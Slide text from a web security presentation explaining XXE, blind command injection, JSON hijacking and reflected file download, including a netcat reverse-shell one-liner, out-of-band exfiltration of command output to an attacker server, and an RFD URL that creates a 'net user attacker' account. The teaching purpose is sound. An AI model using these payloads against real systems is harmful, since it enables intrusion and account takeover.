Slideshare uses cookies to improve functionality and performance, and to provide you with relevant advertising. If you continue browsing the site, you agree to the use of cookies on this website. See our User Agreement and Privacy Policy.

Slideshare uses cookies to improve functionality and performance, and to provide you with relevant advertising. If you continue browsing the site, you agree to the use of cookies on this website. See our Privacy Policy and User Agreement for details.

6.
• XXE ( XML External Entity Injection)
According To OWASP
An XML External Entity attack is a type of an injection attack
against an application that parses XML input. This attack
occurs when XML input containing a reference to an external
entity is processed by a weakly configured XML parser. This
attack may lead to the disclosure of confidential data
6

10.
• XXE ( XML External Entity Injection)
10
I am leaving the rest of the process, As per the “testing.php” response. We added a get
parameter called “ping” and see we were to able to execute commands.
This is a scenario, Where target system have some beta testing application which is under
development or etc. You should figured out what you can do with XXE or any other
vulnerability

15.
Blind RCE ( Blind Remote/OS Command Execution )
According To Nature/Behaviour 
Similar or Elder Brother Of Blind SQL Injection vulnerability.
Command injection is an attack in which the goal is execution of
arbitrary commands on the host operating system via a
vulnerable application
According To OWASP
15

16.
Blind RCE ( Blind Remote/OS Command Execution )
Why RCE Take Place ?
Missing/Lack of sanitization of user input, which will append at
system shell while execution.
16

18.
Blind RCE ( Blind Remote/OS Command Execution )
Some Basic About Using Double Commands
• A; B = Run A and then B, no matter success execution of A
• A || B = Run B if A failed, No matter if B got failed, A will still run
• A && B = Run B if A works, If A Failed B will not execute
• A & B = Run B and then run A in background, If A failed B will still
get executed
• A | B = Run A and pass the output of A to B
• A %0a B (Use full for web app)
• $(nc –nv ip port –e /bin/bash) 18

21.
Blind RCE ( Blind Remote/OS Command Execution )
21
In demonstration, We are assuming that target server is configured in such a way that he will
not send reverse connection using netcat -e option and we cant use wget also.
Response from command “id” getting logged in our python simple http server
Lets see are we able to access the /var/tmp folder.Yes we are because
in python server we got the response as /var/tmp
Using similar kind of aproach, We can interact with shell response. Remember we are
not using netcat –e option for the response, But we are just piping the output to another machine

22.
Blind RCE ( Blind Remote/OS Command Execution )
Fixing The Command Execution
• The developer should scrub all input for malicious
characters.
• It is much easier to define the legal characters than the
illegal characters.
22

24.
JSON Response Hijacking
Similar to CSRF, This vulnerability basically based on Browsers
Bug which allow an attacker to steal sensitive JSON response
from victim authenticated session or there could be more
interesting thing.
According To Sources
24

29.
Reflected File Download
According To Sources
29
RFD is a web attack vector that enables attackers to gain
complete control over a victims machine by virtually
downloading a file from a trusted domain.
Recently found in Facebook & Google Etc by researchers.
Source- https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf

30.
Reflected File Download
Reflected: There should be reflection of the value given in the URL as response
Filename: File name should allowing or characterized by great or excessive freedom
of behavior which should also accept additional user control values and file type.
Like application can accept filename between first slash “/” and “?” character.
Ex. Code (PHP)
(Will Not Work)
Lets Separate Those Words
30

31.
Reflected File Download
Download :
https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycomm
and “malicious.bat/,exe“
So basically this is browser behavior that how he will handle the download process,
Mention behavior is for chrome Expect other browsers.
Other brewers may have different behavior for the same.
Lets Separate Those Words
31

32.
Reflected File Download
1. Attacker send a malicious URL to victim of trusted domain.
Ex.
http://anytrustedsite.com/apitest/search;setup.bat?term=f00b
ar&callback=net user attacker attacker
2. Victim found the domain is trusted. So he will access the URL.
3. After clicking on the URL, The file will be downloaded and
after executing that file, Some interesting thing will happened.
;)
Attack Scenario
32

34.
Reflected File Download
As you can can see we having a web application. The value of
download parameter is getting back in response without file name
header.
And the response is downloadable
34

35.
Reflected File Download
Now we are going to enter a file name in url, Because the response header don’t
have the file name header. So we have chance that we can control the file name
from URL it self.
35

36.
Reflected File Download
Now can craft a payload as input which will execute some system command on victim machine.
As per the reflection we can separate out the rest of the value to perform a command execution
36

37.
Reflected File Download
After executing that file we have calc execution.
37